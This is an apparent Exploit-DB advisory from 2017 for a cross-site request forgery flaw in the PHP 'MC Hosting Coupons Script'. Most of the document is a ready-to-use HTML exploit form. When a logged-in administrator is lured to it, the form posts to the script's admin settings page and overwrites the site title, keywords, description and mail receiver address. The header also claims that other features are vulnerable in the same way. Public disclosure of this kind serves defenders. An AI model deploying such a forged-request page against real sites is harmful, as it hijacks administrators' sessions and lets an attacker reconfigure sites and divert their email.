MC Hosting Coupons Script - Cross-Site Request Forgery

EDB-ID:

41067

CVE:

N/A




Platform:

PHP

Date:

2017-01-15


# # # # # 
# Vulnerability: Cross-Site Request Forgery
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Hosting Coupons Script
# Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Other features have the same security vulnerability.
# Exploit:
<html>
<body>
<form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form">
<label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br>
<input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br>
<label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br>
<input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords"  placeholder="Write website keywords..." /><br>
<label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br>
<input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br>
<label for="website_desc" class="control-label col-lg-4">Website Description</label><br>
<textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br>
<input type="submit" name="sub" value="Submit" class="btn btn-primary" />
</form>
</body>
</html>
# # # # #